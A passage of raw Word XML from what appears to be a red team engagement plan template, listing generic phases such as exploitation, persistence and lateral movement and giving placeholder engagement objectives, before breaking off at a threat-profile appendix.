          <w:numId w:val="64"/>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Web presence evaluation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D1498FB" w14:textId="77777777" w:rsidR="00BB134D" w:rsidRPr="00BB134D" w:rsidRDefault="00BB134D" w:rsidP="00BB134D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="64"/>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 xml:space="preserve">Browse as a normal user through a web proxy to capture intelligence and </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>understanding</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="2A3DA12A" w14:textId="77777777" w:rsidR="00BB134D" w:rsidRPr="00BB134D" w:rsidRDefault="00BB134D" w:rsidP="00BB134D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="64"/>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 xml:space="preserve">Identify known vulnerabilities and vulnerable </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>conditions</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="195C82C8" w14:textId="77777777" w:rsidR="00BB134D" w:rsidRPr="00BB134D" w:rsidRDefault="00BB134D" w:rsidP="00BB134D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="64"/>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Exploitation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D11E0D1" w14:textId="77777777" w:rsidR="00BB134D" w:rsidRPr="00BB134D" w:rsidRDefault="00BB134D" w:rsidP="00BB134D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="64"/>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 xml:space="preserve">Attempt to exploit targets based on current </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>knowledge</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="01EA6136" w14:textId="77777777" w:rsidR="00BB134D" w:rsidRPr="00BB134D" w:rsidRDefault="00BB134D" w:rsidP="00BB134D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="64"/>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 xml:space="preserve">Perform situational awareness on </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>target</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="179FF956" w14:textId="77777777" w:rsidR="00BB134D" w:rsidRPr="00BB134D" w:rsidRDefault="00BB134D" w:rsidP="00BB134D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="64"/>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Attempt Local Privilege Elevation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F2D0BDE" w14:textId="77777777" w:rsidR="00BB134D" w:rsidRPr="00BB134D" w:rsidRDefault="00BB134D" w:rsidP="00BB134D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="64"/>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Attempt Domain or other system level Privilege Elevation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E2D3A43" w14:textId="77777777" w:rsidR="00BB134D" w:rsidRPr="00BB134D" w:rsidRDefault="00BB134D" w:rsidP="00BB134D">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t>Stay-In</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1820E480" w14:textId="77777777" w:rsidR="00BB134D" w:rsidRPr="00BB134D" w:rsidRDefault="00BB134D" w:rsidP="00BB134D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="65"/>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Post Exploitation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40EAB2E7" w14:textId="77777777" w:rsidR="00BB134D" w:rsidRPr="00BB134D" w:rsidRDefault="00BB134D" w:rsidP="00BB134D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="65"/>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 xml:space="preserve">Identify domain user/groups </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>memberships</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="06DE2ECC" w14:textId="77777777" w:rsidR="00BB134D" w:rsidRPr="00BB134D" w:rsidRDefault="00BB134D" w:rsidP="00BB134D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="65"/>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 xml:space="preserve">Identify IP </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>space</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="14B60AA6" w14:textId="77777777" w:rsidR="00BB134D" w:rsidRPr="00BB134D" w:rsidRDefault="00BB134D" w:rsidP="00BB134D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="65"/>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 xml:space="preserve">Identify file </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>shares</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="26C3412C" w14:textId="77777777" w:rsidR="00BB134D" w:rsidRPr="00BB134D" w:rsidRDefault="00BB134D" w:rsidP="00BB134D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="65"/>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 xml:space="preserve">Establish </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>persistence</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="2BA7F7AC" w14:textId="77777777" w:rsidR="00BB134D" w:rsidRPr="00BB134D" w:rsidRDefault="00BB134D" w:rsidP="00BB134D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="65"/>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 xml:space="preserve">Use persistence plan to place agents on target </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>systems</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="65D54E49" w14:textId="77777777" w:rsidR="00BB134D" w:rsidRPr="00BB134D" w:rsidRDefault="00BB134D" w:rsidP="00BB134D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="65"/>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Move Laterally</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43292754" w14:textId="77777777" w:rsidR="00BB134D" w:rsidRPr="00BB134D" w:rsidRDefault="00BB134D" w:rsidP="00BB134D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="65"/>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Continued Lateral Movement</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CD68F12" w14:textId="77777777" w:rsidR="00BB134D" w:rsidRPr="00BB134D" w:rsidRDefault="00BB134D" w:rsidP="00BB134D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="65"/>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Continued Enumeration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E3B58F0" w14:textId="77777777" w:rsidR="00BB134D" w:rsidRPr="00BB134D" w:rsidRDefault="00BB134D" w:rsidP="00BB134D">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t>Act</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75CFE040" w14:textId="77777777" w:rsidR="00BB134D" w:rsidRPr="00BB134D" w:rsidRDefault="00BB134D" w:rsidP="00BB134D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="66"/>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lastRenderedPageBreak/>
        <w:t>Operational Impact</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42DAFB33" w14:textId="77777777" w:rsidR="00BB134D" w:rsidRPr="00BB134D" w:rsidRDefault="00BB134D" w:rsidP="00BB134D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="66"/>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 xml:space="preserve">Perform planned operational </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>impacts</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="65E3A86B" w14:textId="77777777" w:rsidR="00BB134D" w:rsidRPr="00BB134D" w:rsidRDefault="00BB134D" w:rsidP="00BB134D">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:caps/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:caps/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>APPENDIX D – ENGAGEMENT OBJECTIVES</w:t>
      </w:r>
      <w:hyperlink r:id="rId89" w:anchor="appendix-d--engagement-objectives" w:tooltip="Direct link to heading" w:history="1">
        <w:r w:rsidRPr="00BB134D">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
            <w:caps/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>​</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="69C1095B" w14:textId="77777777" w:rsidR="00BB134D" w:rsidRPr="00BB134D" w:rsidRDefault="00BB134D" w:rsidP="00BB134D">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t>As part of the Red Team engagement, [ </w:t>
      </w:r>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t xml:space="preserve">Red </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t>Team</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t> ]</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t> will be replicating the TTPs associated with the group known as [ </w:t>
      </w:r>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t>insert group</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t xml:space="preserve"> ]. Details have been provided in the threat profile listed in the </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t>Appendix .</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t xml:space="preserve"> This threat has been known to exploit and attack the systems and networks servicing the transactional records, customer order database, and XYZ of organizations similar to [ </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t>Customer</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t> ]</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D90C4E5" w14:textId="77777777" w:rsidR="00BB134D" w:rsidRPr="00BB134D" w:rsidRDefault="00BB134D" w:rsidP="00BB134D">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t>Objective 1:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25DE610E" w14:textId="77777777" w:rsidR="00BB134D" w:rsidRPr="00BB134D" w:rsidRDefault="00BB134D" w:rsidP="00BB134D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="67"/>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Integrity of critical customer transactional data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F3E2416" w14:textId="77777777" w:rsidR="00BB134D" w:rsidRPr="00BB134D" w:rsidRDefault="00BB134D" w:rsidP="00BB134D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="67"/>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Determine ability of threat to [ </w:t>
      </w:r>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">insert </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>objective</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t> ]</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="6DFB3D33" w14:textId="77777777" w:rsidR="00BB134D" w:rsidRPr="00BB134D" w:rsidRDefault="00BB134D" w:rsidP="00BB134D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="67"/>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Determine the system’s ability to [ </w:t>
      </w:r>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">insert </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>objective</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t> ]</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="5A67CC3B" w14:textId="77777777" w:rsidR="00BB134D" w:rsidRPr="00BB134D" w:rsidRDefault="00BB134D" w:rsidP="00BB134D">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t>Objective 2:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B12D344" w14:textId="77777777" w:rsidR="00BB134D" w:rsidRPr="00BB134D" w:rsidRDefault="00BB134D" w:rsidP="00BB134D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="68"/>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Integrity of customer’s order database</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C3FBDC1" w14:textId="77777777" w:rsidR="00BB134D" w:rsidRPr="00BB134D" w:rsidRDefault="00BB134D" w:rsidP="00BB134D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="68"/>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Determine ability of threat to [ </w:t>
      </w:r>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">insert </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>objective</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t> ]</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="345F7E17" w14:textId="77777777" w:rsidR="00BB134D" w:rsidRPr="00BB134D" w:rsidRDefault="00BB134D" w:rsidP="00BB134D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="68"/>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Determine the system’s ability to [ </w:t>
      </w:r>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">insert </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>objective</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t> ]</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="4E74FE43" w14:textId="77777777" w:rsidR="00BB134D" w:rsidRPr="00BB134D" w:rsidRDefault="00BB134D" w:rsidP="00BB134D">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t>Objective 3:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="794B3C3C" w14:textId="77777777" w:rsidR="00BB134D" w:rsidRPr="00BB134D" w:rsidRDefault="00BB134D" w:rsidP="00BB134D">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="69"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t>Evaluation of Incident Response Procedures</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5652B937" w14:textId="77777777" w:rsidR="00BB134D" w:rsidRPr="00BB134D" w:rsidRDefault="00BB134D" w:rsidP="00BB134D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="69"/>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Determine ability of threat to [ </w:t>
      </w:r>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">insert </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>objective</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t> ]</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="3E9850B7" w14:textId="77777777" w:rsidR="00BB134D" w:rsidRPr="00BB134D" w:rsidRDefault="00BB134D" w:rsidP="00BB134D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="69"/>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Determine the system’s ability to [ </w:t>
      </w:r>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">insert </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>objective</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t> ]</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="745D5F3C" w14:textId="77777777" w:rsidR="00BB134D" w:rsidRPr="00BB134D" w:rsidRDefault="00BB134D" w:rsidP="00BB134D">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:caps/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:caps/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>APPENDIX E – THREAT PROFILE</w:t>
      </w:r>
      <w:hyperlink r:id="rId90" w:anchor="appendix-e--threat-profile" w:tooltip="Direct link to heading" w:history="1">
        <w:r w:rsidRPr="00BB134D">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
            <w:caps/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>​</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="3D1B6A12" w14:textId="77777777" w:rsidR="00BB134D" w:rsidRPr="00BB134D" w:rsidRDefault="00BB134D" w:rsidP="00BB134D">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
